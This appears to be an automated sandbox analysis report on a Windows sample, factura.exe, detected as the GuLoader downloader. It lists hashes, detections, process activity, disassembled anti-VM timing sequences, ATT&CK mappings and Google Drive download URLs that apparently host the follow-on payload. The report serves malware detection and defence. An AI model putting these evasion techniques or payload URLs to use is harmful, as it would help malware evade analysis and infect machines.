Play interactive tour

Edit tour

Analysis Report factura.exe

Overview

General Information

Sample Name:	factura.exe
Analysis ID:	384277
MD5:	5950cbe94b3b5dedbf7b75fa1b95ac84
SHA1:	797bb1231483bb11279f6e63fbb5d675bda58f2a
SHA256:	73f2aa87dad06704e8bbd41fb7449a987dc089160a12ba5e13d7d7f6f4196a4f
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Potential malicious icon found

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to hide a thread from the debugger

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found potential dummy code loops (likely to delay analysis)

Hides threads from debuggers

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

factura.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\factura.exe' MD5: 5950CBE94B3B5DEDBF7B75FA1B95AC84)

RegAsm.exe (PID: 5420 cmdline: 'C:\Users\user\Desktop\factura.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

RegAsm.exe (PID: 5388 cmdline: 'C:\Users\user\Desktop\factura.exe' MD5: 529695608EAFBED00ACA9E61EF333A7C)

conhost.exe (PID: 5392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: RegAsm.exe PID: 5388	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: factura.exe	Virustotal: Detection: 49%	Perma Link
Source: factura.exe	Metadefender: Detection: 27%	Perma Link
Source: factura.exe	ReversingLabs: Detection: 45%

Source: factura.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 15_2_00C035C9 InternetReadFile,

15_2_00C035C9

Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	String found in binary or memory: http://pki.g
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp, RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp, RegAsm.exe, 0000000F.00000002.1031906231.00000000010A0000.00000004.00000020.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RegAsm.exe, 0000000F.00000002.1031906231.00000000010A0000.00000004.00000020.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/dU
Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/
Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/A
Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/Mw#
Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/S
Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/s
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbe
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbe4J
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbe8J
Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbeOj
Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbeWJ
Source: RegAsm.exe, 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbef
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbehJ
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbepJ
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbewmBbjvsikSdqvbetubek
Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=10SUfaVtm3h4B1EKTZwmBbjvsikSdqvbeyJ
Source: RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0

System Summary:

Potential malicious icon found

Show sources

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Source: C:\Users\user\Desktop\factura.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C001DE EnumWindows,NtSetInformationThread,	15_2_00C001DE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C031B1 NtProtectVirtualMemory,	15_2_00C031B1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C00219 NtSetInformationThread,	15_2_00C00219
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C0352C NtProtectVirtualMemory,	15_2_00C0352C

Source: C:\Users\user\Desktop\factura.exe

Code function: 0_2_0040169C

0_2_0040169C

Source: factura.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutionsCollutions vs factura.exe
Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutions vs factura.exe
Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutions( vs factura.exe
Source: factura.exe, 00000000.00000002.1021965132.0000000002230000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamekvalifikationen.exeFE2XCollutionsW vs factura.exe
Source: factura.exe, 00000000.00000000.637238818.000000000040E000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamekvalifikationen.exe vs factura.exe
Source: factura.exe, 00000000.00000002.1021928094.00000000021E0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs factura.exe
Source: factura.exe	Binary or memory string: OriginalFilenamekvalifikationen.exe vs factura.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: factura.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.rans.troj.evad.winEXE@4/0@0/0

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5392:120:WilError_01

Source: factura.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\factura.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Users\user\Desktop\factura.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: factura.exe	Virustotal: Detection: 49%
Source: factura.exe	Metadefender: Detection: 27%
Source: factura.exe	ReversingLabs: Detection: 45%

Source: unknown	Process created: C:\Users\user\Desktop\factura.exe 'C:\Users\user\Desktop\factura.exe'
Source: C:\Users\user\Desktop\factura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\factura.exe'
Source: C:\Users\user\Desktop\factura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\factura.exe'
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5388, type: MEMORY

Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_00403542 push ebx; ret	0_2_00403557
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_0040657D push FFFFFFC2h; iretd	0_2_004065A9
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_004065AB push FFFFFFC2h; iretd	0_2_004065A9
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_00403E6A pushad ; ret	0_2_00403E6B
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_00401E38 push esp; retf 0040h	0_2_00401E39
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_00403ED0 push esp; retf	0_2_00403EDA
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_00403E90 push esp; retf	0_2_00403EDA
Source: C:\Users\user\Desktop\factura.exe	Code function: 0_2_00403F18 push esp; retf	0_2_00403EDA

Source: C:\Users\user\Desktop\factura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\factura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\factura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\factura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\factura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 15_2_00C00AE8 LoadLibraryA,

15_2_00C00AE8

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\factura.exe

RDTSC instruction interceptor: First address: 0000000000411A41 second address: 0000000000411A41 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F99E4842F68h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F99E4842F51h 0x00000026 cmp ah, dh 0x00000028 push ecx 0x00000029 call 00007F99E4842F79h 0x0000002e call 00007F99E4842F78h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Evasive API call chain: GetPEB, DecisionNodes, Sleep

graph_15-1808

Tries to detect Any.run

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\factura.exe	RDTSC instruction interceptor: First address: 0000000000412C6A second address: 0000000000412C0B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b retn 0004h 0x0000000e cmp edx, dword ptr [esp+04h] 0x00000012 jne 00007F99E4842F34h 0x00000014 cmp edx, edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 lfence 0x0000001c rdtsc
Source: C:\Users\user\Desktop\factura.exe	RDTSC instruction interceptor: First address: 0000000000412B18 second address: 0000000000412A79 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+14h] 0x0000000e add esi, dword ptr [ebp+04h] 0x00000011 mov esi, dword ptr [esi+eax*4] 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 mov dword ptr [ebp+08h], esi 0x0000001a retn 0004h 0x0000001d pushad 0x0000001e lfence 0x00000021 rdtsc
Source: C:\Users\user\Desktop\factura.exe	RDTSC instruction interceptor: First address: 0000000000411A41 second address: 0000000000411A41 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F99E4842F68h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F99E4842F51h 0x00000026 cmp ah, dh 0x00000028 push ecx 0x00000029 call 00007F99E4842F79h 0x0000002e call 00007F99E4842F78h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\factura.exe	RDTSC instruction interceptor: First address: 0000000000411B03 second address: 0000000000411B03 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F99E4D9C4AAh 0x0000001d popad 0x0000001e call 00007F99E4D9B20Bh 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\user\Desktop\factura.exe	RDTSC instruction interceptor: First address: 0000000000412BA9 second address: 0000000000412BA9 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push dword ptr [eax+ecx] 0x0000000e pop dword ptr [ebx+ecx] 0x00000011 cmp bx, ax 0x00000014 test cx, 1B46h 0x00000019 inc ecx 0x0000001a inc ecx 0x0000001b inc ecx 0x0000001c inc ecx 0x0000001d cmp dl, bl 0x0000001f cmp ecx, 18h 0x00000022 jne 00007F99E4842F38h 0x00000024 cmp edx, edx 0x00000026 pushad 0x00000027 lfence 0x0000002a rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000C02C6A second address: 0000000000C02C0B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b retn 0004h 0x0000000e cmp edx, dword ptr [esp+04h] 0x00000012 jne 00007F99E4D9B1C4h 0x00000014 cmp edx, edx 0x00000016 mov eax, dword ptr [eax] 0x00000018 pushad 0x00000019 lfence 0x0000001c rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000C02B18 second address: 0000000000C02A79 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, dword ptr [ebp+14h] 0x0000000e add esi, dword ptr [ebp+04h] 0x00000011 mov esi, dword ptr [esi+eax*4] 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 mov dword ptr [ebp+08h], esi 0x0000001a retn 0004h 0x0000001d pushad 0x0000001e lfence 0x00000021 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000C01B03 second address: 0000000000C01B03 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F99E4D9C4AAh 0x0000001d popad 0x0000001e call 00007F99E4D9B20Bh 0x00000023 lfence 0x00000026 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 15_2_00C02A2C rdtsc

15_2_00C02A2C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 5448

Thread sleep time: -40000s >= -30000s

Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: RegAsm.exe, 0000000F.00000002.1031878163.000000000105B000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWX
Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWMA=v

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 15_2_00C001DE NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000

15_2_00C001DE

Found potential dummy code loops (likely to delay analysis)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process Stats: CPU usage > 90% for more than 60s

Hides threads from debuggers

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 15_2_00C02A2C rdtsc

15_2_00C02A2C

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 15_2_00C01D57 LdrInitializeThunk,

15_2_00C01D57

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C00AE8 mov eax, dword ptr fs:[00000030h]	15_2_00C00AE8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C00E25 mov eax, dword ptr fs:[00000030h]	15_2_00C00E25
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C00FE2 mov eax, dword ptr fs:[00000030h]	15_2_00C00FE2
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C02BEE mov eax, dword ptr fs:[00000030h]	15_2_00C02BEE
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C01996 mov eax, dword ptr fs:[00000030h]	15_2_00C01996
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C029BD mov eax, dword ptr fs:[00000030h]	15_2_00C029BD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 15_2_00C02F5D mov eax, dword ptr fs:[00000030h]	15_2_00C02F5D

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: RegAsm.exe, 0000000F.00000002.1031956172.00000000014E0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection2	Virtualization/Sandbox Evasion321	OS Credential Dumping	Security Software Discovery821	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection2	LSASS Memory	Virtualization/Sandbox Evasion321	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	System Information Discovery31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
factura.exe	49%	Virustotal		Browse
factura.exe	30%	Metadefender		Browse
factura.exe	46%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
http://pki.g	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pki.goog/gsr2/GTS1O1.crt0	RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pki.g	RegAsm.exe, 0000000F.00000002.1031916338.00000000010B0000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/GTS1O1core.crl0	RegAsm.exe, 0000000F.00000002.1031930913.00000000010CC000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	384277
Start date:	08.04.2021
Start time:	20:43:47
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	factura.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
